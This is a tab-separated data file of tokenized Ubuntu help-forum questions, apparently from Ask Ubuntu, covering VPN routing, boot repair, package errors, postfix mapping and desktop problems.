511539	natting with ubuntu 14.04 wo n't forward the packet to the originator	i have succeeded in creating a vpn on amazon vpc using ubuntu 14.04 with openswan . my subnet on amazon is 192.168.254.0/24 . my gateway which is in this case ubuntu 14.04 has 192.168.254.17 ip . the other side of the network vpn is under 172.25.0.0/24 . i have launched another box with ip 192.168.254.128 . when i ping 172.25.38.99 form 254.128 i have no reply . but a tcpdump on the gateway 254.17 tcpdump -i eth0 host 172.25.38.99 has revealed the following : 01:28:04.596582 ip 172.25.38.99 > 192.168.254.128 : icmp echo reply , id 1707 , seq 10 , length 64 01:28:04.596631 ip 172.25.38.99 > 192.168.254.128 : icmp echo reply , id 1707 , seq 10 , length 64 01:28:05.424327 ip 192.168.254.128 > 172.25.38.99 : icmp echo request , id 1707 , seq 11 , length 64 01:28:05.604689 ip 172.25.38.99 > 192.168.254.128 : icmp echo reply , id 1707 , seq 11 , length 64 01:28:05.604738 ip 172.25.38.99 > 192.168.254.128 : icmp echo reply , id 1707 , seq 11 , length 64 01:28:06.432343 ip 192.168.254.128 > 172.25.38.99 : icmp echo request , id 1707 , seq 12 , length 64 01:28:06.612721 ip 172.25.38.99 > 192.168.254.128 : icmp echo reply , id 1707 , seq 12 , length 64 01:28:06.612775 ip 172.25.38.99 > 192.168.254.128 : icmp echo reply , id 1707 , seq 12 , length 64 from my limited knowledge on this it appears to me that once the packet reaches 254.17 it gets lost . how can i possibly fix this ? i ca n't figure it out with the nat rules . thanks in advance .
511541	youtube videos playing too quickly , and without sound ?	new ubuntu / linux user here . my first week of using and learning this operating system everything seemed to be working great . until today . youtube videos in firefox are speeding through very quickly and without sound . my system received an update yesterday , i 'm wondering if that could have caused the problem . please help .
511545	how to start executable program from terminal ?	i downloaded a program from the internet . i simply took the file from 'downloads ' and put it on my desktop . i can launch the program by double clicking on it . however i can not figure out how to start this program from the terminal . i tried the following without luck or any leads : ./ clipgrab-3.4.2.x86_64 sh clipgrab-3.4.2.x86_64 typed 'alacarte ' into the terminal , in an attempt to find the program of interest to locate name which would allow it to open . launched program with terminal open to find any hints nautilus-autorun-software clipgrab-3.4.2.x86_64 the settings when i right click the program look like this : i searched all over 'askubuntu ' but did n't find the answer . i hope you can shed some light . thanks in advance . mike
511550	half installed package nightmare	at some point , one of my servers stopped writing to its network attached storage device ( i presume ) , and it resulted in a week or more 's worth of packages ending up in the `` half-installed '' state . what is odd is that apt-get does not report any issues and i was able to get the most recent updates to install as intended . it was only when i took a look through the logs ( dpkg.log* ) and found that there was many more packages in this state . i need a way to go through all of the packages in apt-get or dpkg , and perform an apt-get install < packagename > -- reinstall operation . unless there is another way to clean up this mess . does anybody have any idea on how i can do this ? or have any other ideas on how to resolve this issue ?
511552	is it ok to install ubuntu 14.04.1 in any drive but c ?	i have windows 7 already installed in my pc . need to install linux now and there is not much space left in c. i have completely emptied another drive g to install ubuntu there . will this approach cause any problem ?
511554	can not install ubuntu 14.04 . can not see installation screen when boot from dvd/usb	hi i have this problem and it is very frustrating . i downloaded 64 bit ubuntu 14.04 and make both dvd and usb drive from the iso file . i want to install ubunto alongside with my win 8.1 . when i choose to boot from usb/dvd under uefi mode , i can see to options to try or install ubuntu . but if i select one of them , i just see a black screen and it stays that way forever . so i can never actually install ubuntu because i can not even see the installation screen ! i turned off fast boot in win 8.1 and secure boot in uefi . i do not know what causes the problem . i built this desktop by my own and the motherboard is asrock z77 and cpu is 3570k . can anyone help me with this problem ? i really need to use ubuntu . thank you so much ! !
511557	genymotion not loading virtual machine on ubuntu 12.04	i recently successfully installed virtualbox and genymotion on ubuntu . everything was successful except for one thing . when i try to play the virtual machine , this is the output - unable to load virtualbox engine . make sure that you have installed it correctly before starting genymotion . for more information refer to : https : //cloud.genymotion.com/page/faq/ # vbox how can i fix this issue so that i will be able to run my virtual devices . thanks .
511563	turn off ap ( hotspot ) through terminal	how can i turn off the ap hotspot through the terminal , since when i turn it off in network settings the program crashes . also : how do i get networking to start when the computer boots up ? it does n't for whatever reason
511565	`` ubuntu one services will shut down '' notification displayed at each session	the notification : ubuntu one ubuntu one file services will be shutting down on june 1st , 2014.thanks for your support . comes at each session i log on . please tell me how do i deactivate it . june 1 has long passed . i 'm also attaching a picture .
511566	clarification on instructions posted on linuxcnc.org	new to ubuntu and trying to figure out what instructions posted on linuxcnc.org mean . context of the following is from within ubuntu : hit the `` windows '' key on your keyboard to bring up the system search bar . search for `` software center '' and launch it . here 's what i do n't understand : open the edit menu and launch software sources . where/what is the `` edit '' menu and how do i launch `` software sources '' add a new apt line that looks like this : deb http : //linuxcnc.org/ precise base 2.6 ... .. this if from notes posted at : http : //wiki.linuxcnc.org/cgi-bin/wiki.pl ? updatingto2.6 about halfway down the page you will find : fresh install on ubuntu 12.04 ( precise )
511567	how to remove an icon from the menu bar without uninstalls ?	i know , one can uninstall or blacklist a particular app or service so that it does n't show up on the top menu bar , but is there a way you can voluntarily , and safely ( without any terminal bashing or changing the system ( read uninstall ) ) remove an icon ? for example , i do n't need ubuntu one now , or the mail icon . there are different ways of doing that , like uninstalling empathy and thunderbird , but i need those apps once a while . so my question is : how do i simply , peacefully , remove a certain icon from the menu bar without uninstalling or blacklisting any app or service ?
511571	can magic sysrq be used to switch workstations or kill specific processes ?	my pc , running ubuntu from a live cd , is frozen . i think it 's because i have too many firefox tabs open , which is overloading my memory . is there anyway to use magic sysrq to only kill firefox ? or to switch workstations or something to try and restore functionality ?
511572	packages go missing after bootup and certain indicators do n't seem to install anymore	i 'm running an up-to-date ubuntu 14.04 , which i frankenstein 'd into xubuntu and up to this point it 's been working just fine . when i booted my computer up today , i noticed that a few icons on my dock and panel were missing . however , i am writing this post on the computer of which i speak . so things are n't messed up so bad it 's unusable . what went missing : vlc , audacity , and some other apps which i have yet to find and probably wo n't be missed network and audio indicators ( kind of important but my system is still usable ) something in the bluetooth stack which is causing it not to work something in policykit , so i ca n't use gui packaging tools anymore ( does n't really matter since i use the cli like a big boy anyway ) what still works : network manager , as it connected to my home wifi just fine mail and power indicators for some inexplicable reason compiz , which starts automatically on login xfce itself , so the system is still perfectly usable pretty much every other app i 've installed on my system what may be causing a problem : i installed my system from an ubuntu 14.04 disc and frankenstein 'd it into xubuntu ( again , it 's been working just fine until now , so that 's probably not the problem here ) i built vogl for some reason and had to install some development headers ( which should n't cause a problem ) and some qt5 stuff so it would build - i 'm guessing the latter is causing the problem here i did update once or twice after building vogl what i 've done so far : vlc and audacity installed without any hiccups . what 's weird is that it had to install pretty much all their dependencies along with them . i installed the network indicator back , and it did n't seem to appear again after logging out and logging back in , and even rebooting . what 's even weirder is that the package manager wanted to pull the whole unity 8 stack along with it , even with the -- no-install-recommends flag . that thoroughly confuses me . it 's as if the dependencies just changed overnight . this is not like ubuntu , especially for an lts release . i removed unity 8 , but it pulled the network indicator along with it . which should be expected , seeing as unity came along with the network indicator . i even removed the qt5 stuff i had installed earlier , and that did n't help either . the package manager still wanted to pull in the whole unity 8 stack , which is not what i want . like i said before , this does n't make my system unusable per se , it 's just that i 'll be going back to school in a week and need to be able to connect to the wifi there . so that part is kinda important . the sound indicator i do n't need necessarily either , because i still have pavucontrol and my media keys to work with . so my question is now , how can i install the unity 7 version of the indicators ( which had been working just fine in xfce before this whole fiasco ) without pulling in the whole unity 8 stack ? also , any suggestions for fixing my bluetooth stack ? update : i have gotten the network and sound indicators back . i will look elsewhere to fix policykit and bluetooth , as it seems these problems are n't related to what packages i have installed . then again , i could be wrong . i will accept the answer that ( mostly ) worked for me , hopefully someone else gets something out of this .
511573	intel xmm 7160 4g module	we are testing the latest intel xmm 7160 module with our equipments , but it seems there is no driver for windows and linux os in the module . we bought the module from 4gltemall.com but the seller ca n't provide the driver for us . could anybody provide the driver for us ? thank you .
511574	apt-get update error 14.04	im new to linux and im having this problem whilst trying to fix a grub boot problem . this is the problem if someone could please help me with this . thank you . ps , freshly installed via dvd , fresh out the box dell inspiron 11 3000 series . 4gb ram .
511578	boot-repair broken windows boot	i have a hp laptop with preinstalled windows 8 . i recently added a second hard drive and installed ubuntu on it , but grub would n't display its usual gui , just a command prompt , and i could n't access ubuntu . to fix this , i ran boot-repair from a live copy of ubuntu . this worked in that now when i select ubuntu in the 'change boot device order ' menu , it takes me to grub , but when my laptop boots it starts trying to run the windows boot manager , and then just shows a bsod . i am no longer able to access windows . anybody know how i can fix this ? thanks !
511579	error with mysql and mongodb server	i am trying to install mysql server in ubuntu , however i am facing mongodb error which i once tried to install and was unsuccesful . i already tried to remove mongodb but its not installed anyway . what could be the issue here ? ? dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : mysql-server-5.5 mongodb-org-server mysql-server e : sub-process /usr/bin/dpkg returned an error code ( 1 )
511581	data recovery after ubuntu installation	i had windows 8 pre-installed on my laptop and i wanted to install ubuntu alongside . unfortunately , it formatted all the partitions ( windows 8 and all other files too ) and showing that my hdd has 319 gb of freespace ( i have 320gb hard disk ) . i 'm new to linux and have not learnt much . i 've read about testdisk and all but ca n't understand it well . could someone please get me elaborate step-by-step guide for recovering as much loss data as i possibly could ? secondly is it possible to later install windows 8.1 alongside ubuntu ?
511583	/etc/sudoers file problem understanding	according to the documentation , modifications of this file may enables local users to execute sudo commands on remote machines : user1 192.168.1.14= ( user2 : group1 ) all according to what i read , this entry enables user1 to execute all commands on the host with the ip 192.168.1.14 . how can this be possible ? i also have problems understanding what does running commands as different users means ?
511585	good image viewer for ubuntu 14.04	please suggest me a good image viewer for ubuntu 14.04 . i liked picasa for windows so if there is any which resembles it then suggest .
511586	white pixels at left border in gnome flashback	i run the gnome flashback with metacity session . i just upgraded from 12.04 to 14.04.1 . after the upgrade , when i have an application maximized , there sometimes appears a little 1-pixel-wide white column at the left edge of the screen . ( black border added for visibility ) which can be erased by causing the application to draw over it . for instance , if i select a line in the pictured terminal , or if i click the `` file '' menu button , the white pixels will go away where they were overwritten . however , if for instance i switch to another maximized window and back , the white pixels will reappear . this issue manifests itself not only in the terminal but in all maximized applications . how can i get rid of these ?
511587	ubuntu lts 12.04 pc died after suspend / sata hd 's not recognized	running ubuntu 12.04 lts successfully for many months . asus mobo . two hd 's on board ( wd 250 gb / wd 1 tb ) . suspended the pc yesterday and tried to `` unsuspend '' . nothing happened . system was dead quiet . seemed to be power supply . after replacing the power supply and getting a proper bios , got `` reboot and select proper boot device '' . sata drives are not recognized . is it possible that my hd controllers ( on the hd ) got fried ? is this a bios configuration and i 've just forgotten if it is raid / ide / ahci ? am i in limbo because ubuntu went into suspend and ca n't reboot from the drive ?
511588	epson xp202 will not install	i am using 14.04 which has been great until today trying to print using epson xp202 . previously the printer worked after installing drivers no problem on older versions of ubuntu/lubuntu . now i have tried simply adding the printer and letting ubuntu find and install driver - this asks for password then freezes . i have tried via software centre it either freezes and crashes or it cues me behind an update which never finishes . i have tried from epson site but it just goes into download folder or prompts software centre to open and then freezes again . any ideas ?
511589	bootmgr missing after installation of boot-repair : ubuntu 14.04 onpre-existing windows 7	i have encountered this problem on my notebook ( with pre-existing windows 7 ) . initially , i wanted to install ubuntu 14.04 alongside windows , and the ubuntu installation went well . however , when i wanted to access windows , i could no longer do so ( ubuntu works just fine ) . so , i did some googling and found the boot-repair iso file and did a boot-repair . it was shown that the boot repair was successful , but when i restarted my notebook again , i was met with `` bootmgr is missing '' . my boot details is as follows : http : //paste.ubuntu.com/8049879 i 'd still like to have access to both ubuntu and windows 7 . regards , kester
511590	12.10 is a `` no longer supported '' version . i was hoping to safely step through upgrades leading to 14.04.1	i disagree with the [ duplicate ] stamp applied to my question . the insinuation was that my question is the same as ; why is âno new release foundâ when upgrading from a lts to the next ? my question is asking if i can acquire and end-of-life download of 12.10 so that i might proceed through the remaining upgrades . i was hoping to upgrade sequentially from my current version , 12.04 to 14.04.1 . version 12.10 is no longer supported making it impossible for me to make the first step up to 12.10 . i 'm not confident about what data to back-up if i decide to just go for a fresh install of 14.04.1 . any guidance would be appreciated !
511591	need help with postfix canonical mapping	i’m having difficulty getting the canonical_maps function to work as needed to repair some incorrect addresses from a legacy client . here’s the situation and what i’ve tried so far : legacy client ( oldhost.legacy.org ) does not append its domain ( legacy.org ) to addresses in the envelope or the message when sending them via smtp . so , if the user types an address such as guser @ oldhost , it goes out with smtp as user @ oldhost instead of user @ oldhost.legacy.org . the machine with postfix ( newhost.standard.org ) has a different domain ( standard.org ) from the legacy machine . it also acts as mx and relay for the oldhost.legacy.org domain . when messages from the legacy client arrive at the postfix machine with addresses such as guser @ oldhost ( missing .legacy.org ) , i’d like to rewrite those to read user @ oldhost.legacy.org . it’s my understanding that the canonical_maps function is intended for this purpose . in /etc/postfix/canonical.pcre i have : /^ ( . * ) @ oldhost $ / $ 1 @ oldhost.legacy.org if i test with : postmap –qguser @ oldhostpcre : /etc/postfix/canonical.pcre the answer is : user @ oldhost.legacy.org . perfect . in /etc/postfix/main.cf i have canonical_maps = pcre : /etc/postfix/canonical.pcre then , on the legacy host , i send a message such as : to : user @ someotherhost.domain cc : user @ oldhost the message arrives at the postfix machine , but the cc line is not rewritten . the documentation for canonical_maps says that in order for the headers to be rewritten , the client needs to either match the local_header_rewrite_clients or else the remote_header_rewrite_domain must be non-null . i tried both but neither produces the output that i need . if i set local_header_rewrite_clients = static : all or permit_mynetworks or some other option that would cause a match of the legacy client , then the append_dot_domain option takes over and rewrites the address as user @ oldhost.standard.org . the canonical table is apparently ignored . if i instead leave local_header_rewrite_clients at its default ( which does not match the legacy client ) and turn on remote_header_rewrite_domain = invalid.domain , then the address is rewritten as user @ oldhost.invalid.domain and , once again , the canonical table is apparently ignored . so the documentation for the canonical table is correct that rewriting only occurs if the local_header_rewrite_clients matches the client or if remote_header_rewrite_domain is set . and the rewrites are indeed occurring . but the rewriting that takes place completely ignores the canonical table . so how do i get postfix to apply the append_dot_domain and append_at_myorigin only to itself and apply the canonical table to other clients or , at least apply the canonical table first ?
511592	upgrading from ubuntu 12.04 to 14.04.1 lts	i would love to have help for this . i have been trying to upgrade from ubuntu 12.04 to ubuntu 14.04 but have been having the messages below . w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/hardy/universe/source/sources 404 not found [ ip : 91.189.91.15 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/hardy-updates/universe/source/sources 404 not found [ ip : 91.189.91.15 80 ] e : some index files failed to download . they have been ignored , or old ones used instead.` > here is the content of # deb cdrom : [ ubuntu 12.04.4 lts _precise pangolin_ - release amd64 ( 20140204 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 12.04.4 lts _precise pangolin_ - release amd64 ( 20140204 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04.4 lts _precise pangolin_ - release amd64 ( 20140204 ) ] / precise main restricted deb-src http : //mirrors.gigenet.com/ubuntuarchive/ precise main restricted # added by software-properties # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //mirrors.gigenet.com/ubuntuarchive/ precise main restricted deb-src http : //mirrors.gigenet.com/ubuntuarchive/ precise multiverse universe # added by software-properties # # major bug fix updates produced after the final release of the # # distribution . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //mirrors.gigenet.com/ubuntuarchive/ precise universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //mirrors.gigenet.com/ubuntuarchive/ precise multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //mirrors.gigenet.com/ubuntuarchive/ precise-security main restricted deb-src http : //mirrors.gigenet.com/ubuntuarchive/ precise-security restricted main multiverse universe # added by software-properties deb http : //mirrors.gigenet.com/ubuntuarchive/ precise-security universe deb http : //mirrors.gigenet.com/ubuntuarchive/ precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu precise partner deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main deb http : //archive.canonical.com/ precise partner deb-src http : //archive.canonical.com/ precise partner deb http : //hu.old-releases.ubuntu.com/ubuntu/ hardy universe deb-src http : //hu.old-releases.ubuntu.com/ubuntu/ hardy universe deb http : //hu.old-releases.ubuntu.com/ubuntu/ hardy-updates universe deb-src http : //hu.old-releases.ubuntu.com/ubuntu/ hardy-updates universe deb http : //mirrors.gigenet.com/ubuntuarchive/ precise-updates restricted main multiverse universe deb-src http : //mirrors.gigenet.com/ubuntuarchive/ precise-updates restricted main multiverse universe # added by software-properties deb http : //mirrors.gigenet.com/ubuntuarchive/ precise-proposed restricted main multiverse universe
511594	ubuntu touch threads priority ; will touch be as laggy as android , or smooth like ios ?	are there separate user interface and rendering threads in ubuntu touch ? in other words , will ubuntu touch be laggy like android or smooth like ios ?
511596	download apps in ubuntu software centre	i am having a problem authenticating in ubuntu 12.04 . i have no password . i have bought my computer online . there is no password when i log in . it 's showing me unsuccessful password . so i can not download any app from the ubuntu software system .
511601	how to make suspend work without the screen staying black afterwards ?	i recently installed ubuntu 14.04 on my laptop , and whenever i try to resume my computer after suspending it , everything starts up fine except my screen , which remains black ( no backlight ) . my laptop even responds to keyboard presses and mouse clicks as if it 's awake , i just ca n't see anything . i tried using this command to suspend : sudo pm-suspend -- quirk-dpms-on when i did that , my laptop was able to resume successfully , screen included , if that helps .
511606	remember each window/browser size and location	ubuntu 14.04.1 lts with latest cinnamon updated . is there a way/software to remember the size and location of each window/application/browser that survives a reboot ? for example after logging in , i want to launch 2 terminals and a 3 browser windows on 2 monitors with specific size and locations . does something like this exist ? any pointers would be appreciated . thank you .
511612	14.04 will not boot after installing the latest nvidia drivers	i have a hp envy laptop with an nvidia optimus gpu . when installing nvidia 331 from the additional drivers application everything appears to be fine until i reboot . it will not go further than asking me for my encryption password . purging the nvidia installation solves the problem how ever my battery will drain very quickly without the correct drivers . any help would be greatly appreciated . james .
511613	backup during installation of ubuntu alongside windows	is it necessary to create a backup before installing ubuntu on windows 7 ? if so , how do i do that in as little time as possible ? ?
511614	image editor with a frames feature	is there any image editor in ubuntu that has a frames feature ? the frames should be built in with the option of adding more . optionally it can have the option to add my own custom text . for example . having this frame : you can get this :
511619	how to publish an application without add-apt-repository ?	i have an application , and now i want to publish it via ubuntu centre . then , user can install it by using command ( only one command ) : sudo apt-get install my_app_name i read publishing to a ppa but user have to add ppa by the command : sudo add-apt-repository ppa : bobdobbs/superedit
511620	recommended hardware requirements 14.04	the question is already marked as `` duplicate '' , but where are the answers ?
511622	nautilus right click behaviour	when i scroll the left column in nautilus out of the initial view and find the target folder and then right click it ( e.g . to insert a copied a file or open in new window ) , nautilus jumps the window back to the initial view highlighting a folder in the position my mouse is pointing at but ignoring my scroll action . can this be modified ? i would like the same behaviour like on left-click . ( ubuntu 12.4 )
511623	what is the default set of packages installed with trusty ?	where can i find a list of all the packages that get installed by default with ubuntu 14.04 ?
511629	does libre office have an equivalent of one note , or is there another alternative ?	i know that libre office is a bit like microsoft office , but i ca n't find the equivalent of one note , something that i used a lot before i moved over to ubuntu , and i do miss the features that it had . currently i use evernote web , or just nothing at all . does this not exist ?
511631	dev/loop0 shows 99 % full - can not download files	dev/loop0 shows 99 % full . when i run df -h it shows the following : filesystem size used avail use % mounted on /dev/loop0 17g 17g 267m 99 % / i try to download some files but it gives me a disk full error . can someone please guide me on how to free up the dev/loop0 space ?
511632	connected to a wireless ap but no internet	i just upgraded to 14.04 and i 'm not able to load pages even though wifi is connected . here 's the output of ifconfig ( i was using usb tethering ) . please give me some pointers on how to diagnose the problem . none of the solutions i 've found on the net seem to work . eth0 link encap : ethernet hwaddr e8:11:32 : c8:0a : c9 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:4243 errors:0 dropped:0 overruns:0 frame:0 tx packets:4243 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:367881 ( 367.8 kb ) tx bytes:367881 ( 367.8 kb ) usb0 link encap : ethernet hwaddr ce : d7:4e:83 : b5:1d inet addr:192.168.42.43 bcast:192.168.42.255 mask:255.255.255.0 inet6 addr : fe80 : :ccd7:4eff : fe83 : b51d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:21509 errors:3 dropped:0 overruns:0 frame:3 tx packets:18704 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:20493903 ( 20.4 mb ) tx bytes:3119847 ( 3.1 mb ) wlan0 link encap : ethernet hwaddr e0 : ca:94:6c:9b:07 inet addr:192.168.1.7 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :e2ca:94ff : fe6c:9b07/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:575 errors:0 dropped:0 overruns:0 frame:165220 tx packets:290 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:55055 ( 55.0 kb ) tx bytes:24434 ( 24.4 kb ) interrupt:16
511633	terminal tab not opening in same directory	since upgrading to ubuntu 14.04 whenever i open a new tab in the terminal i am in the home directory instead of the directory i was in in the other tab . how can i change it to stay in the directory from the tab i opened it from ?
511636	application windows getting stuck between workspaces in unity	my problem is when i open , minimize and reopen multiple applications , ( with workspaces turned on ) sometimes the windows get stuck between the workspaces , is this a bug or supposed to happen , of course i can always open workspace switcher and put it back in the right one , but i donât want my windows to keep getting messed up .
511638	gnome instead of ubuntu default desktop environement	i 've created a new standard use account , but it logs in only in gnome . how can i change to ubuntu default desktop environment ? the old user works fine .
511643	booting ubuntu from usb on zotac zbox hd	i successfully made bootable usb with ubuntu 14.04 . i 've already tried it on couple of computers , and it works perfectly . because i want to boot ubuntu on these pcs just time from the time , i do n't want to change boot priority in bios . instead , on startup screen , i hit f12 ( or equivalent ) and pc lets me to choose from which hardware i want to boot os . the problem is that on other computer , zotac zbox hd , i was not able to get into this boot menu . i 've tried hit esc , f1 , f2 , f11 , f12 , del , but none of them worked . not that i just was n't able to get into boot menu , but not even into bios . strange thing is that there 's no screen that tells you what you have to press in order to open bios or something like that - after pressing start button , for few seconds there 's blank screen , then on 2 seconds there 's zotac logo and after that windows 7 loading screen . my question is - when and what i have to hit in order to access either bios or boot menu .
511645	error while exporting picture through content hub	i 'm writing an app and i 'm trying to incorporate content hub into it . my app downloads various file formats so i want to be able to export images , videos and other types of content to other apps . i followed this content hub guide but found it lacking in examples for exporting content . anyway , when i 'm trying to export any content , the transfer 's state always changes to `` aborted '' immediately and i have no idea why . here is my opencontentpopup component : popupbase { id : root property var activetransfer property var items : [ ] property alias contenttype : peerpicker.contenttype connections { target : activetransfer onstatechanged : { console.log ( `` transfer state changed to `` + activetransfer.state ) } } contentpeerpicker { id : peerpicker handler : contenthandler.destination onpeerselected : { for ( var i = 0 ; i < items.length ; i++ ) { console.log ( `` sharing item with name : `` + items [ i ] .name + `` , url : `` + items [ i ] .url ) } activetransfer = peer.request ( ) activetransfer.items = root.items activetransfer.state = contenttransfer.charged popuputils.close ( root ) } oncancelpressed : { popuputils.close ( root ) } } } when i 'm trying to export an image the contentpeerpicker gives me the option to open the gallery app , but when i select the gallery app the gallery app is n't opened and it appears that the transfer 's state is aborted ( or 5.. ) . my logs in the code example give me : < debug > sharing item with name : name , url : file : ///home/phablet/.local/share/com.nogzatalz.downow/download/cover.jpg < debug > transfer state changed to 5 manifest.json : { `` name '' : `` com.nogzatalz.downow '' , `` description '' : `` torrent downloading app '' , `` framework '' : `` ubuntu-sdk-14.10-qml-dev3 '' , `` architecture '' : `` armhf '' , `` title '' : `` downow '' , `` hooks '' : { `` downow '' : { `` desktop '' : `` downow.desktop '' , `` apparmor '' : `` apparmor.json '' , `` urls '' : `` urldispatcher.json '' , `` content-hub '' : `` content-hub.json '' } } , `` version '' : `` 0.1.28 '' , `` maintainer '' : `` downow support < downow-support @ nogzatalz.com > '' } content-hub.json : { `` source '' : [ `` pictures '' , `` videos '' ] } apparmor.json : { `` policy_groups '' : [ `` networking '' , `` content_exchange '' , `` content_exchange_source '' , `` audio '' ] , `` policy_version '' : 1.2 } i really think we need better error messages.. any help is appreciated ! thanks , tal
511647	why is monodevelop not running ? mscorlib.dll	i have recently installed mono 3.2.8 and monodevelop 4 from the ubuntu 14.04 software centre . however , when i try to run monodevelop from the dash menu , nothing happens - due to this , i tried to run it from the terminal and it said `` the assembly mscorlib.dll was not found or could not be loaded . it should have been installed in the /usr/lib/mono/4.5/mscorlib.dll directory . '' how do i fix this ? i have already trie a variety of things that do not work . i have already tried running the following commands : sudo apt-get install mono-complete sudo apt-get install mono-devel sudo apt-get install mono-gmcs sudo apt-get install mono-dmcs sudo apt-get install libmono-system.data2.0-cil sudo apt-get install libmono-system2.0-cil sudo apt-get install libmono2.0-cil sudo apt-get install -- reinstall monodevelop sudo apt-get install -- reinstall mono-runtime none of these worked . what shall i do ? edit now , i installed libmono-corlib4.0-cil and libmono-corlib4.5-cil , and that problem has been fixed . however , a new message has now appeared : missing method .ctor in assembly /usr/lib/monodevelop/bin/monodevelop.ide.dll , type system.runtime.compilerservices.extensionattribute ca n't find custom attr constructor image : /usr/lib/monodevelop/bin/monodevelop.ide.dll mtoken : 0x0a000910 * assertion at class.c:5597 , condition ` ! mono_loader_get_last_error ( ) ' not met stacktrace : at < unknown > < 0xffffffff > at monodevelop.startup.monodevelopmain.main ( string [ ] ) < il 0x00001 , 0x00013 > at ( wrapper runtime-invoke ) < module > .runtime_invoke_int_object ( object , intptr , intptr , intptr ) < il 0x0005c , 0xffffffff > native stacktrace : monodevelop ( ) [ 0x8105b4a ] [ 0xb76f340c ] [ 0xb76f3424 ] /lib/i386-linux-gnu/libc.so.6 ( gsignal+0x47 ) [ 0xb74de937 ] /lib/i386-linux-gnu/libc.so.6 ( abort+0x143 ) [ 0xb74e1d63 ] monodevelop ( ) [ 0x8288b23 ] monodevelop ( ) [ 0x8288bb3 ] monodevelop ( ) [ 0x816b4d1 ] monodevelop ( mono_class_get_full+0xff ) [ 0x816bdff ] monodevelop ( mono_class_from_name+0x107 ) [ 0x816c237 ] monodevelop ( mono_class_from_typeref+0x190 ) [ 0x816b9a0 ] monodevelop ( mono_class_get_full+0x164 ) [ 0x816be64 ] monodevelop ( mono_class_get+0x1f ) [ 0x816bf4f ] monodevelop ( mono_metadata_parse_mh_full+0x45c ) [ 0x81b29fc ] monodevelop ( mono_method_get_header+0xbf ) [ 0x819130f ] monodevelop ( ) [ 0x807ff7c ] monodevelop ( ) [ 0x8066ccc ] monodevelop ( ) [ 0x8068de4 ] monodevelop ( ) [ 0x8069aee ] monodevelop ( ) [ 0x8106d17 ] [ 0xb76dc03e ] [ 0xb71a02fd ] monodevelop ( ) [ 0x8069bf0 ] debug info from gdb : could not attach to process . if your uid matches the uid of the target process , check the setting of /proc/sys/kernel/yama/ptrace_scope , or try again as the root user . for more details , see /etc/sysctl.d/10-ptrace.conf ptrace : operation not permitted . no threads . ================================================================= got a sigabrt while executing native code . this usually indicates a fatal error in the mono runtime or one of the native libraries used by your application . =================================================================
511649	mouse is disabling by itself after upgrading kernel to 3.13.0-34-generic	usb mouse is disabling by itself after working for 5-10 seconds . when i tried to use cursor is n't moving . but after right clicking continuously its re-enabling by itself
511650	can not install python module urlparse	some program written in python 2.7 complains that importerror : no module named 'urlparse ' . so i need to install the module , but i am not able to do it . the module does exist , it is described e.g . at https : //docs.python.org/2/library/urlparse.html . however , neither apt-get install , nor pip install are able to find a module named urlparse , python-urlparse , urllib , python-urllib ... -- i 'm getting messages like could not find any downloads that satisfy the requirement ... the only exception is the package python-urllib3 which probably contains the needed files but for python 3 and installation of which did not help . i 've installed pip , not pip3 since i need the module for python 2 ( pip 1.4.1 from /usr/lib/python2.7/dist-packages ( python 2.7 ) ) . my ubuntu is xubuntu 13.10 . where 's the problem , please ? is pip searching for the module in the right places ? i do n't know what locations it should search in ...
511651	how to uninstall sbt ?	my current installed simple build tool ( sbt ) is corrupted and i want to reinstall it . the problem is i did n't install sbt through sudo apt-get command . i followed the tutorial here : https : //class.coursera.org/progfun-004/wiki/toolssetup instructions that i followed from the webpage : download sbt from here : http : //scalasbt.artifactoryonline.com/scalasbt/sbt-native-packages/org/scala-sbt/sbt/0.12.4/sbt.tgz unpack the archive to a directory of your choice add the bin/ directory to the path environment variable . open the file ~/.bashrc in an editor ( create it if it doesnât exist ) and add the following line export path=/path/to/your/sbt/bin : $ path so how do i uninstall sbt on ubuntu in the first place ? i tried running sudo apt-get remove sbt but it does n't work . any ideas ? this is what i get when i run the above command : $ sudo apt-get remove sbt reading package lists ... done building dependency tree reading state information ... done package 'sbt ' is not installed , so not removed the following packages were automatically installed and are no longer required : ax25-node libax25 libossp-uuid16 openbsd-inetd use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 324 not upgraded .
511656	fastest screen sharing on ubuntu ?	have you come across a smooth and high screen quality alernative to teamviewr or screen sharing via google hangout ? on long sessions it becomes very tiresome as there is so much lag so the image is very jerky .
